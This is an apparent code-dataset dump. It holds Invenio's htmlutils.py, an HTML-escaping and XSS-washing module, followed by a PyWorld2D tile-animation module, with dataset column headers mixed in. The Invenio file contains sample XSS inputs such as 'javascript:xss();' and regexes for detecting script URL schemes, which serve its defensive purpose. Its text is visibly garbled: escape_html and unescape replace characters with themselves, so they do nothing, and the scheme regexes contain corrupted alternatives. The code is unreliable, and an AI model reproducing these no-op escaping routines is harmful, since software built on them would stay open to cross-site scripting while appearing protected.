text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML utilities."""
__revision__ = "$Id$"
from HTMLParser import HTMLParser
from invenio.config import CFG_SITE_URL, \
CFG_MATHJAX_HOSTING, \
CFG_MATHJAX_RENDERS_MATHML, \
CFG_SITE_LANG, \
CFG_WEBDIR
from invenio.textutils import indent_text, encode_for_xml
import re
import cgi
import os
import sys
if sys.hexversion < 0x2060000:
try:
import simplejson as json
CFG_JSON_AVAILABLE = True
except ImportError:
# Okay, no Ajax app will be possible, but continue anyway,
# since this package is only recommended, not mandatory.
CFG_JSON_AVAILABLE = False
json = None
else:
import json
CFG_JSON_AVAILABLE = True
try:
from BeautifulSoup import BeautifulSoup
CFG_BEAUTIFULSOUP_INSTALLED = True
except ImportError:
CFG_BEAUTIFULSOUP_INSTALLED = False
try:
import tidy
CFG_TIDY_INSTALLED = True
except ImportError:
CFG_TIDY_INSTALLED = False
# List of allowed tags (tags that won't create any XSS risk)
CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST = ('a',
'p', 'br', 'blockquote',
'strong', 'b', 'u', 'i', 'em',
'ul', 'ol', 'li', 'sub', 'sup', 'div', 'strike')
# List of allowed attributes. Be cautious, some attributes may be risky:
# <p style="background: url(myxss_suite.js)">
CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST = ('href', 'name', 'class')
## precompile some often-used regexp for speed reasons:
RE_HTML = re.compile("(?s)<[^>]*>|&#?\w+;")
RE_HTML_WITHOUT_ESCAPED_CHARS = re.compile("(?s)<[^>]*>")
# url validation regex
regex_url = re.compile(r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def nmtoken_from_string(text):
"""
Returns a Nmtoken from a string.
It is useful to produce XHTML valid values for the 'name'
attribute of an anchor.
CAUTION: the function is surjective: 2 different texts might lead to
the same result. This is improbable on a single page.
Nmtoken is the type that is a mixture of characters supported in
attributes such as 'name' in HTML 'a' tag. For example,
<a name="Articles%20%26%20Preprints"> should be tranformed to
<a name="Articles372037263720Preprints"> using this function.
http://www.w3.org/TR/2000/REC-xml-20001006#NT-Nmtoken
Also note that this function filters more characters than
specified by the definition of Nmtoken ('CombiningChar' and
'Extender' charsets are filtered out).
"""
text = text.replace('-', '--')
return ''.join( [( ((not char.isalnum() and not char in ['.', '-', '_', ':']) and str(ord(char))) or char)
for char in text] )
def escape_html(text, escape_quotes=False):
"""Escape all HTML tags, avoiding XSS attacks.
< => <
> => >
& => &:
@param text: text to be escaped from HTML tags
@param escape_quotes: if True, escape any quote mark to its HTML entity:
" => "
' => '
"""
text = text.replace('&', '&')
text = text.replace('<', '<')
text = text.replace('>', '>')
if escape_quotes:
text = text.replace('"', '"')
text = text.replace("'", ''')
return text
CFG_JS_CHARS_MAPPINGS = {
'\\': '\\\\',
"'": "\\'",
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
'\v': '\\v',
}
for i in range(0x20):
CFG_JS_CHARS_MAPPINGS.setdefault(chr(i), '\\u%04x' % (i,))
for i in (0x2028, 0x2029):
CFG_JS_CHARS_MAPPINGS.setdefault(unichr(i), '\\u%04x' % (i,))
RE_ESCAPE_JS_CHARS = re.compile(u'''[\\x00-\\x1f\\\\"\\\\'\\b\\f\\n\\r\\t\\v\u2028\u2029]''')
RE_CLOSING_SCRIPT_TAG = re.compile('</script>', re.IGNORECASE)
def escape_javascript_string(text, escape_for_html=True, escape_quote_for_html=False, escape_CDATA=True, escape_script_tag_with_quote='"'):
"""
Escape text in order to be used as Javascript string in various
context.
Examples::
>>> text = '''"Are you a Munchkin?" asked Dorothy.
"No, but I am their friend"'''
>>> escape_javascript_string(text)
>>> \\""Are you a Munchkin?\\" asked Dorothy.\\n\\"No, but I am their friend\\"'
The returned string can be enclosed either in single or double
quotes delimiters.
THE FUNCTION ASSUME THAT YOU HAVE ALREDADY WASHED THE STRING FROM
UNSAFE CONTENT, according to the context you plan to use the
string. The function will just make sure that the string will not
break you Javascript/HTML code/markup.
If you plan to include the string inside the body of an HTML page,
you will probably want to set C{escape_for_html} to True, in order
to produce XHTML-valid pages when the input string contain
characters such as < , > and &.
Furthermore if you plan to include the string as part of a tag
attribute (for eg. <a href="#" onclick="foo"bar"), you might
want to set C{escape_quote_for_html} to True.
If you plan to include the string inside the body of an HTML page,
enclosed by CDATA delimiters, then you would *not* need to escape
HTML tags. Using CDATA delimeters enables to include Javascript
strings meant to refer to HTML tags (eg. in case you would like to
manipulate the DOM tree to add new nodes to the page), which would
not be possible when escaping the HTML. For eg.:
/*<![CDATA[*/
document.getElementById('foo').innerHTML = '<p>bar</p>'
/*]]>*/
In this case you will probably want to set C{escape_CDATA} to True
in order to produce an XHTML-valid document, in case a closing
CDATA delimeter is in your input string. Parameter C{escape_CDATA}
is not considered when C{escape_for_html} is set to True.
Note that CDATA delimiters might be automatically added by the
browser, based on the content-type used to serve the page.
When C{escape_for_html} is set to False, whatever option is chosen
for C{escape_CDATA}, the string must not contain a '</script>' tag
(apparently...). The only option to keep this '</script>' tag (if
you need it) is to split it, which requires to know which quote
delimiter your plan to use. For eg:
Examples::
>>> text = '''foo</script>bar'''
>>> val = escape_javascript_string(text, escape_for_html=False, escape_script_tag_with_quote='"')
>>> 'foo</scr"+"ipt>bar'
>>> mycode = '''alert("%s")''' % val
C{escape_script_tag_with_quote} is not considered when
C{escape_for_html} is set to True.
If you are planning to return the string as part of a pure
Javascript document, then you should in principle set both
C{escape_for_html} and C{escape_CDATA} to False, and
C{escape_script_tag_with_quote} to None.
@param text: string to be escaped
@param escape_for_html: if True, also escape input for HTML
@param escape_CDATA: if True, escape closing CDATA tags (when C{escape_for_html} is False)
@escape_script_tag_with_quote: which quote will be used to delimit your string, in case you must wash, but keep, C{</script>} tag (when C{escape_for_html} is False)
"""
if escape_quote_for_html:
text = text.replace('"', '"')
if escape_for_html:
text = cgi.escape(text)
elif escape_CDATA:
text = text.replace(']]>', ']]]]><![CDATA[>')
if CFG_JSON_AVAILABLE:
text = json.dumps(text)[1:-1].replace("'", "\\'")
else:
# Try to emulate
def escape_chars(matchobj):
return CFG_JS_CHARS_MAPPINGS[matchobj.group(0)]
text = RE_ESCAPE_JS_CHARS.sub(escape_chars, text)
if not escape_for_html and escape_script_tag_with_quote:
text = RE_CLOSING_SCRIPT_TAG.sub('''</scr%(q)s+%(q)sipt>''' % {'q': escape_script_tag_with_quote}, text)
return text
class HTMLWasher(HTMLParser):
"""
Creates a washer for HTML, avoiding XSS attacks. See wash function for
details on parameters.
Usage::
from invenio.htmlutils import HTMLWasher
washer = HTMLWasher()
escaped_text = washer.wash(unescaped_text)
Examples::
a.wash('Spam and <b><blink>eggs</blink></b>')
=> 'Spam and <b>eggs</b>'
a.wash('Spam and <b><blink>eggs</blink></b>', True)
=> 'Spam and <b><blink>eggs</blink></b>'
a.wash('Spam and <b><a href="python.org">eggs</u></b>')
=> 'Spam and <b><a href="python.org">eggs</a></b>'
a.wash('Spam and <b><a href="javascript:xss();">eggs</a></b>')
=>'Spam and <b><a href="">eggs</a></b>'
a.wash('Spam and <b><a href="jaVas cRipt:xss();">poilu</a></b>')
=>'Spam and <b><a href="">eggs</a></b>'
"""
silent = False
def __init__(self):
""" Constructor; initializes washer """
HTMLParser.__init__(self)
self.result = ''
self.nb = 0
self.previous_nbs = []
self.previous_type_lists = []
self.url = ''
self.render_unallowed_tags = False
self.allowed_tag_whitelist = \
CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST
self.allowed_attribute_whitelist = \
CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST
# javascript:
self.re_js = re.compile( ".*(j|j|J)"\
"\s*(a|a|A)"\
"\s*(v|v|V)"\
"\s*(a|a|A)"\
"\s*(s|s|S)"\
"\s*(c|c|C)"\
"\s*(r|r|R)"\
"\s*(i|Ã|I)"\
"\s*(p|p|P)"\
"\s*(t|p|T)"\
"\s*(:|:).*", re.IGNORECASE | re.DOTALL)
# vbscript:
self.re_vb = re.compile( ".*(v|v|V)"\
"\s*(b|b|B)"\
"\s*(s|s|S)"\
"\s*(c|c|C)"\
"\s*(r|r|R)"\
"\s*(i|Ã|I)"\
"\s*(p|p|P)"\
"\s*(t|p|T)"\
"\s*(:|:).*", re.IGNORECASE | re.DOTALL)
def wash(self, html_buffer,
render_unallowed_tags=False,
allowed_tag_whitelist=CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST,
automatic_link_transformation=False,
allowed_attribute_whitelist=\
CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST):
"""
Wash HTML buffer, escaping XSS attacks.
@param html_buffer: text to escape
@param render_unallowed_tags: if True, print unallowed tags escaping
< and >. Else, only print content of unallowed tags.
@param allowed_tag_whitelist: list of allowed tags
@param allowed_attribute_whitelist: list of allowed attributes
"""
self.reset()
self.result = ''
self.nb = 0
self.previous_nbs = []
self.previous_type_lists = []
self.url = ''
self.render_unallowed_tags = render_unallowed_tags
self.automatic_link_transformation = automatic_link_transformation
self.allowed_tag_whitelist = allowed_tag_whitelist
self.allowed_attribute_whitelist = allowed_attribute_whitelist
self.feed(html_buffer)
self.close()
return self.result
def handle_starttag(self, tag, attrs):
"""Function called for new opening tags"""
if tag.lower() in self.allowed_tag_whitelist:
self.result += '<' + tag
for (attr, value) in attrs:
if attr.lower() in self.allowed_attribute_whitelist:
self.result += ' %s="%s"' % \
(attr, self.handle_attribute_value(value))
self.result += '>'
else:
if self.render_unallowed_tags:
self.result += '<' + cgi.escape(tag)
for (attr, value) in attrs:
self.result += ' %s="%s"' % \
(attr, cgi.escape(value, True))
self.result += '>'
elif tag == 'style' or tag == 'script':
# In that case we want to remove content too
self.silent = True
def handle_data(self, data):
"""Function called for text nodes"""
if not self.silent:
possible_urls = re.findall(r'(https?://[\w\d:#%/;$()~_?\-=\\\.&]*)', data)
# validate possible urls
# we'll transform them just in case
# they are valid.
if possible_urls and self.automatic_link_transformation:
for url in possible_urls:
if regex_url.search(url):
transformed_url = '<a href="%s">%s</a>' % (url, url)
data = data.replace(url, transformed_url)
self.result += data
else:
self.result += cgi.escape(data, True)
def handle_endtag(self, tag):
"""Function called for ending of tags"""
if tag.lower() in self.allowed_tag_whitelist:
self.result += '</' + tag + '>'
else:
if self.render_unallowed_tags:
self.result += '</' + cgi.escape(tag) + '>'
if tag == 'style' or tag == 'script':
self.silent = False
def handle_startendtag(self, tag, attrs):
"""Function called for empty tags (e.g. <br />)"""
if tag.lower() in self.allowed_tag_whitelist:
self.result += '<' + tag
for (attr, value) in attrs:
if attr.lower() in self.allowed_attribute_whitelist:
self.result += ' %s="%s"' % \
(attr, self.handle_attribute_value(value))
self.result += ' />'
else:
if self.render_unallowed_tags:
self.result += '<' + cgi.escape(tag)
for (attr, value) in attrs:
self.result += ' %s="%s"' % \
(attr, cgi.escape(value, True))
self.result += ' />'
def handle_attribute_value(self, value):
"""Check attribute. Especially designed for avoiding URLs in the form:
javascript:myXSSFunction();"""
if self.re_js.match(value) or self.re_vb.match(value):
return ''
return value
def handle_charref(self, name):
"""Process character references of the form "&#ref;". Return it as it is."""
self.result += '&#' + name + ';'
def handle_entityref(self, name):
"""Process a general entity reference of the form "&name;".
Return it as it is."""
self.result += '&' + name + ';'
def tidy_html(html_buffer, cleaning_lib='utidylib'):
"""
Tidy up the input HTML using one of the installed cleaning
libraries.
@param html_buffer: the input HTML to clean up
@type html_buffer: string
@param cleaning_lib: chose the preferred library to clean the HTML. One of:
- utidylib
- beautifulsoup
@return: a cleaned version of the input HTML
@note: requires uTidylib or BeautifulSoup to be installed. If the chosen library is missing, the input X{html_buffer} is returned I{as is}.
"""
if CFG_TIDY_INSTALLED and cleaning_lib == 'utidylib':
options = dict(output_xhtml=1,
show_body_only=1,
merge_divs=0,
wrap=0)
try:
output = str(tidy.parseString(html_buffer, **options))
except:
output = html_buffer
elif CFG_BEAUTIFULSOUP_INSTALLED and cleaning_lib == 'beautifulsoup':
try:
output = str(BeautifulSoup(html_buffer).prettify())
except:
output = html_buffer
else:
output = html_buffer
return output
def get_mathjax_header(https=False):
"""
Return the snippet of HTML code to put in HTML HEAD tag, in order to
enable MathJax support.
@param https: when using the CDN, whether to use the HTTPS URL rather
than the HTTP one.
@type https: bool
@note: with new releases of MathJax, update this function toghether with
$MJV variable in the root Makefile.am
"""
if CFG_MATHJAX_HOSTING.lower() == 'cdn':
if https:
mathjax_path = "https://d3eoax9i5htok0.cloudfront.net/mathjax/2.1-latest"
else:
mathjax_path = "http://cdn.mathjax.org/mathjax/2.1-latest"
else:
mathjax_path = "/MathJax"
if CFG_MATHJAX_RENDERS_MATHML:
mathjax_config = "TeX-AMS-MML_HTMLorMML"
else:
mathjax_config = "TeX-AMS_HTML"
return """<script type="text/x-mathjax-config">
MathJax.Hub.Config({
tex2jax: {inlineMath: [['$','$'],['$$','$$']],
displayMath: [['\\\\[','\\\\]']],
processEscapes: true},
showProcessingMessages: false,
messageStyle: "none"
});
</script>
<script src="%(mathjax_path)s/MathJax.js?config=%(mathjax_config)s" type="text/javascript">
</script>""" % {
'mathjax_path': mathjax_path,
'mathjax_config': mathjax_config,
}
def is_html_text_editor_installed():
"""
Returns True if the wysiwyg editor (CKeditor) is installed
"""
return os.path.exists(os.path.join(CFG_WEBDIR, 'ckeditor', 'ckeditor.js'))
ckeditor_available = is_html_text_editor_installed()
def get_html_text_editor(name, id=None, content='', textual_content=None, width='300px', height='200px',
enabled=True, file_upload_url=None, toolbar_set="Basic",
custom_configurations_path='/ckeditor/invenio-ckeditor-config.js',
ln=CFG_SITE_LANG):
"""
Returns a wysiwyg editor (CKEditor) to embed in html pages.
Fall back to a simple textarea when the library is not installed,
or when the user's browser is not compatible with the editor, or
when 'enable' is False, or when javascript is not enabled.
NOTE that the output also contains a hidden field named
'editor_type' that contains the kind of editor used, 'textarea' or
'ckeditor'.
Based on 'editor_type' you might want to take different actions,
like replace CRLF with <br/> when editor_type equals to
'textarea', but not when editor_type equals to 'ckeditor'.
@param name: *str* the name attribute of the returned editor
@param id: *str* the id attribute of the returned editor (when
applicable)
@param content: *str* the default content of the editor.
@param textual_content: *str* a content formatted for the case where the
wysiwyg editor is not available for user. When not
specified, use value of 'content'
@param width: *str* width of the editor in an html compatible unit:
Eg: '400px', '50%'.
@param height: *str* height of the editor in an html compatible unit:
Eg: '400px', '50%'.
@param enabled: *bool* if the wysiwyg editor is return (True) or if a
simple texteara is returned (False)
@param file_upload_url: *str* the URL used to upload new files via the
editor upload panel. You have to implement the
handler for your own use. The URL handler will get
form variables 'File' as POST for the uploaded file,
and 'Type' as GET for the type of file ('file',
'image', 'flash', 'media')
When value is not given, the file upload is disabled.
@param toolbar_set: *str* the name of the toolbar layout to
use. CKeditor comes by default with 'Basic' and
'Default'. To define other sets, customize the
config file in
/opt/cds-invenio/var/www/ckeditor/invenio-ckconfig.js
@param custom_configurations_path: *str* value for the CKeditor config
variable 'CustomConfigurationsPath',
which allows to specify the path of a
file that contains a custom configuration
for the editor. The path is relative to
/opt/invenio/var/www/
@return: the HTML markup of the editor
"""
if textual_content is None:
textual_content = content
editor = ''
if enabled and ckeditor_available:
# Prepare upload path settings
file_upload_script = ''
if file_upload_url is not None:
file_upload_script = ''',
filebrowserLinkUploadUrl: '%(file_upload_url)s',
filebrowserImageUploadUrl: '%(file_upload_url)s?type=Image',
filebrowserFlashUploadUrl: '%(file_upload_url)s?type=Flash'
''' % {'file_upload_url': file_upload_url}
# Prepare code to instantiate an editor
editor += '''
<script type="text/javascript" language="javascript">//<![CDATA[
/* Load the script only once, or else multiple instance of the editor on the same page will not work */
var INVENIO_CKEDITOR_ALREADY_LOADED
if (INVENIO_CKEDITOR_ALREADY_LOADED != 1) {
document.write('<script type="text/javascript" src="%(CFG_SITE_URL)s/ckeditor/ckeditor.js"><\/script>');
INVENIO_CKEDITOR_ALREADY_LOADED = 1;
}
//]]></script>
<input type="hidden" name="editor_type" id="%(id)seditortype" value="textarea" />
<textarea rows="100" cols="80" id="%(id)s" name="%(name)s" style="width:%(width)s;height:%(height)s">%(textual_content)s</textarea>
<textarea rows="100" cols="80" id="%(id)shtmlvalue" name="%(name)shtmlvalue" style="display:none;width:%(width)s;height:%(height)s">%(html_content)s</textarea>
<script type="text/javascript">//<![CDATA[
var CKEDITOR_BASEPATH = '/ckeditor/';
CKEDITOR.replace( '%(name)s',
{customConfig: '%(custom_configurations_path)s',
toolbar: '%(toolbar)s',
width: '%(width)s',
height:'%(height)s',
language: '%(ln)s'
%(file_upload_script)s
});
CKEDITOR.on('instanceReady',
function( evt )
{
/* If CKeditor was correctly loaded, display the nice HTML representation */
var oEditor = evt.editor;
editor_id = oEditor.id
editor_name = oEditor.name
var html_editor = document.getElementById(editor_name + 'htmlvalue');
oEditor.setData(html_editor.value);
var editor_type_field = document.getElementById(editor_name + 'editortype');
editor_type_field.value = 'ckeditor';
var writer = oEditor.dataProcessor.writer;
writer.indentationChars = ''; /*Do not indent source code with tabs*/
oEditor.resetDirty();
/* Workaround: http://dev.ckeditor.com/ticket/3674 */
evt.editor.on( 'contentDom', function( ev )
{
ev.removeListener();
evt.editor.resetDirty();
} );
/* End workaround */
})
//]]></script>
''' % \
{'textual_content': cgi.escape(textual_content),
'html_content': content,
'width': width,
'height': height,
'name': name,
'id': id or name,
'custom_configurations_path': custom_configurations_path,
'toolbar': toolbar_set,
'file_upload_script': file_upload_script,
'CFG_SITE_URL': CFG_SITE_URL,
'ln': ln}
else:
# CKedior is not installed
textarea = '<textarea rows="100" cols="80" %(id)s name="%(name)s" style="width:%(width)s;height:%(height)s">%(content)s</textarea>' \
% {'content': cgi.escape(textual_content),
'width': width,
'height': height,
'name': name,
'id': id and ('id="%s"' % id) or ''}
editor += textarea
editor += '<input type="hidden" name="editor_type" value="textarea" />'
return editor
def remove_html_markup(text, replacechar=' ', remove_escaped_chars_p=True):
"""
Remove HTML markup from text.
@param text: Input text.
@type text: string.
@param replacechar: By which character should we replace HTML markup.
Usually, a single space or an empty string are nice values.
@type replacechar: string
@param remove_escaped_chars_p: If True, also remove escaped characters
like '&', '<', '>' and '"'.
@type remove_escaped_chars_p: boolean
@return: Input text with HTML markup removed.
@rtype: string
"""
if not remove_escaped_chars_p:
return RE_HTML_WITHOUT_ESCAPED_CHARS.sub(replacechar, text)
return RE_HTML.sub(replacechar, text)
def unescape(s, quote=False):
"""
The opposite of the cgi.escape function.
Replace escaped characters '&', '<' and '>' with the corresponding
regular characters. If the optional flag quote is true, the escaped quotation
mark character ('"') is also translated.
"""
s = s.replace('<', '<')
s = s.replace('>', '>')
if quote:
s = s.replace('"', '"')
s = s.replace('&', '&')
return s
class EscapedString(str):
"""
This class is a stub used by the MLClass machinery in order
to distinguish native string, from string that don't need to be
escaped.
"""
pass
class EscapedHTMLString(EscapedString):
"""
This class automatically escape a non-escaped string used to initialize
it, using the HTML escaping method (i.e. cgi.escape).
"""
def __new__(cls, original_string='', escape_quotes=False):
if isinstance(original_string, EscapedString):
escaped_string = str(original_string)
else:
if original_string and not str(original_string).strip():
escaped_string = ' '
else:
escaped_string = cgi.escape(str(original_string), escape_quotes)
obj = str.__new__(cls, escaped_string)
obj.original_string = original_string
obj.escape_quotes = escape_quotes
return obj
def __repr__(self):
return 'EscapedHTMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
def __add__(self, rhs):
return EscapedHTMLString(EscapedString(str(self) + str(rhs)))
class EscapedXMLString(EscapedString):
"""
This class automatically escape a non-escaped string used to initialize
it, using the XML escaping method (i.e. encode_for_xml).
"""
def __new__(cls, original_string='', escape_quotes=False):
if isinstance(original_string, EscapedString):
escaped_string = str(original_string)
else:
if original_string and not str(original_string).strip():
escaped_string = ' '
else:
escaped_string = encode_for_xml(str(original_string), wash=True, quote=escape_quotes)
obj = str.__new__(cls, escaped_string)
obj.original_string = original_string
obj.escape_quotes = escape_quotes
return obj
def __repr__(self):
return 'EscapedXMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
def __add__(self, rhs):
return EscapedXMLString(EscapedString(str(self) + str(rhs)))
def create_tag(tag, escaper=EscapedHTMLString, opening_only=False, body=None, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
"""
Create an XML/HTML tag.
This function create a full XML/HTML tag, putting toghether an
optional inner body and a dictionary of attributes.
>>> print create_html_tag ("select", create_html_tag("h1",
... "hello", other_attrs={'class': "foo"}))
<select>
<h1 class="foo">
hello
</h1>
</select>
@param tag: the tag (e.g. "select", "body", "h1"...).
@type tag: string
@param body: some text/HTML to put in the body of the tag (this
body will be indented WRT the tag).
@type body: string
@param escape_body: wether the body (if any) must be escaped.
@type escape_body: boolean
@param escape_attr: wether the attribute values (if any) must be
escaped.
@type escape_attr: boolean
@param indent: number of level of indentation for the tag.
@type indent: integer
@param attrs: map of attributes to add to the tag.
@type attrs: dict
@return: the HTML tag.
@rtype: string
"""
if attrs is None:
attrs = {}
for key, value in other_attrs.iteritems():
if value is not None:
if key.endswith('_'):
attrs[key[:-1]] = value
else:
attrs[key] = value
out = "<%s" % tag
for key, value in attrs.iteritems():
if escape_attr:
value = escaper(value, escape_quotes=True)
out += ' %s="%s"' % (key, value)
if body is not None:
if callable(body) and body.__name__ == 'handle_body':
body = body()
out += ">"
if escape_body and not isinstance(body, EscapedString):
body = escaper(body)
out += body
if not opening_only:
out += "</%s>" % tag
elif not opening_only:
out += " />"
if indent:
out = indent_text(out, indent)[:-1]
return EscapedString(out)
class MLClass(object):
"""
Swiss army knife to generate XML or HTML strings a la carte.
>>> from invenio.htmlutils import X, H
>>> X.foo()()
... '<foo />'
>>> X.foo(bar='baz')()
... '<foo bar="baz" />'
>>> X.foo(bar='baz&pi')()
... '<foo bar="baz&pi" />'
>>> X.foo("<body />", bar='baz')
... '<foo bar="baz"><body /></foo>'
>>> X.foo(bar='baz')(X.body())
... '<foo bar="baz"><body /></foo>'
>>> X.foo(bar='baz')("<body />") ## automatic escaping
... '<foo bar="baz"><body /></foo>'
>>> X.foo()(X.p(), X.p()) ## magic concatenation
... '<foo><p /><p /></foo>'
>>> X.foo(class_='bar')() ## protected keywords...
... '<foo class="bar" />'
>>> X["xml-bar"]()()
... '<xml-bar />'
"""
def __init__(self, escaper):
self.escaper = escaper
def __getattr__(self, tag):
def tag_creator(body=None, opening_only=False, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
if body:
return create_tag(tag, body=body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
else:
def handle_body(*other_bodies):
full_body = None
if other_bodies:
full_body = ""
for body in other_bodies:
if callable(body) and body.__name__ == 'handle_body':
full_body += body()
elif isinstance(body, EscapedString):
full_body += body
else:
full_body += self.escaper(str(body))
return create_tag(tag, body=full_body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
return handle_body
return tag_creator
__getitem__ = __getattr__
H = MLClass(EscapedHTMLString)
X = MLClass(EscapedXMLString)
def create_html_select(options, name=None, selected=None, disabled=None, multiple=False, attrs=None, **other_attrs):
"""
Create an HTML select box.
>>> print create_html_select(["foo", "bar"], selected="bar", name="baz")
<select name="baz">
<option selected="selected" value="bar">
bar
</option>
<option value="foo">
foo
</option>
</select>
>>> print create_html_select([("foo", "oof"), ("bar", "rab")], selected="bar", name="baz")
<select name="baz">
<option value="foo">
oof
</option>
<option selected="selected" value="bar">
rab
</option>
</select>
@param options: this can either be a sequence of strings, or a sequence
of couples or a map of C{key->value}. In the former case, the C{select}
tag will contain a list of C{option} tags (in alphabetical order),
where the C{value} attribute is not specified. In the latter case,
the C{value} attribute will be set to the C{key}, while the body
of the C{option} will be set to C{value}.
@type options: sequence or map
@param name: the name of the form element.
@type name: string
@param selected: optional key(s)/value(s) to select by default. In case
a map has been used for options.
@type selected: string (or list of string)
@param disabled: optional key(s)/value(s) to disable.
@type disabled: string (or list of string)
@param multiple: whether a multiple select box must be created.
@type mutable: bool
@param attrs: optional attributes to create the select tag.
@type attrs: dict
@param other_attrs: other optional attributes.
@return: the HTML output.
@rtype: string
@note: the values and keys will be escaped for HTML.
@note: it is important that parameter C{value} is always
specified, in case some browser plugin play with the
markup, for eg. when translating the page.
"""
body = []
if selected is None:
selected = []
elif isinstance(selected, (str, unicode)):
selected = [selected]
if disabled is None:
disabled = []
elif isinstance(disabled, (str, unicode)):
disabled = [disabled]
if name is not None and multiple and not name.endswith('[]'):
name += "[]"
if isinstance(options, dict):
items = options.items()
items.sort(lambda item1, item2: cmp(item1[1], item2[1]))
elif isinstance(options, (list, tuple)):
options = list(options)
items = []
for item in options:
if isinstance(item, (str, unicode)):
items.append((item, item))
elif isinstance(item, (tuple, list)) and len(item) == 2:
items.append(tuple(item))
else:
raise ValueError('Item "%s" of incompatible type: %s' % (item, type(item)))
else:
raise ValueError('Options of incompatible type: %s' % type(options))
for key, value in items:
option_attrs = {}
if key in selected:
option_attrs['selected'] = 'selected'
if key in disabled:
option_attrs['disabled'] = 'disabled'
body.append(create_tag("option", body=value, escape_body=True, value=key, attrs=option_attrs))
if attrs is None:
attrs = {}
if name is not None:
attrs['name'] = name
if multiple:
attrs['multiple'] = 'multiple'
return create_tag("select", body='\n'.join(body), attrs=attrs, **other_attrs)
class _LinkGetter(HTMLParser):
"""
Hidden class that, by deriving from HTMLParser, will intercept all
<a> tags and retrieve the corresponding href attribute.
All URLs are available in the urls attribute of the class.
"""
def __init__(self):
HTMLParser.__init__(self)
self.urls = set()
def handle_starttag(self, tag, attrs):
if tag == 'a':
for (name, value) in attrs:
if name == 'href':
self.urls.add(value)
def get_links_in_html_page(html):
"""
@param html: the HTML text to parse
@type html: str
@return: the list of URLs that were referenced via <a> tags.
@rtype: set of str
"""
parser = _LinkGetter()
parser.feed(html)
return parser.urls
| Dziolas/invenio | modules/miscutil/lib/htmlutils.py | Python | gpl-2.0 | 37,499 | 0.004293 |
import math, os
import pygame
import thorpy
has_surfarray = False
try:
from PyWorld2D.rendering.tilers.beachtiler import BeachTiler
from PyWorld2D.rendering.tilers.basetiler import BaseTiler
from PyWorld2D.rendering.tilers.roundtiler import RoundTiler
from PyWorld2D.rendering.tilers.loadtiler import LoadTiler
has_surfarray = True
except:
from PyWorld2D.rendering.tilers.loadtiler import LoadTiler
def get_mixed_tiles(img1, img2, alpha_img_2):
i1 = img1.copy()
i2 = img2.copy()
i2.set_alpha(alpha_img_2)
i1.blit(i2,(0,0))
return i1
##def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
## w, h = img.get_size()
## s = pygame.Surface((2*w,2*h))
## s.blit(img, (0,0))
## s.blit(img, (w,0))
## s.blit(img, (0,h))
## s.blit(img, (w,h))
## #now we just have to take slices
## images = []
## for i in range(nframes):
## if sin:
## delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
## delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
## else:
## delta_x = i*dx
## delta_y = i*dy
## result = pygame.Surface((w,h))
## result.blit(s,(delta_x-w//2,delta_y-h//2))
## images.append(result)
## if reverse:
## images += images[::-1][1:-1]
## return images
def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
r = img.get_rect()
w,h = r.size
images = []
for i in range(nframes):
if sin:
delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
else:
delta_x = i*dx
delta_y = i*dy
## print(delta_x,w)
## assert abs(delta_x) <= w
## assert abs(delta_y) <= h
result = pygame.Surface(r.size)
xsgn, ysgn = 1, 1
if delta_x>0:
xsgn = -1
if delta_y>0:
ysgn = -1
result.blit(img,r.move(delta_x,delta_y))
result.blit(img,r.move(delta_x,delta_y+ysgn*h))
result.blit(img,r.move(delta_x+xsgn*w,delta_y))
result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h))
images.append(result)
if reverse:
images += images[::-1][1:-1]
return images
def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0,
reverse=False, sin=True, colorkey=None):
"""Returns a list of list of images on the form : imgs[size][frame]"""
imgs = []
for size in sizes:
#smoothscale is important here, otherwise FAST should be always True
img = pygame.transform.smoothscale(img_fullsize, (size,)*2)
dx = 0
if dx_divider:
dx = int(size/dx_divider)
dy = 0
if dy_divider:
dy = int(size/dy_divider)
imgs.append(get_shifted_tiles(img, nframes, dx, dy, reverse, sin))
if colorkey:
for tiles in imgs:
for img in tiles:
img.set_colorkey(colorkey)
return imgs
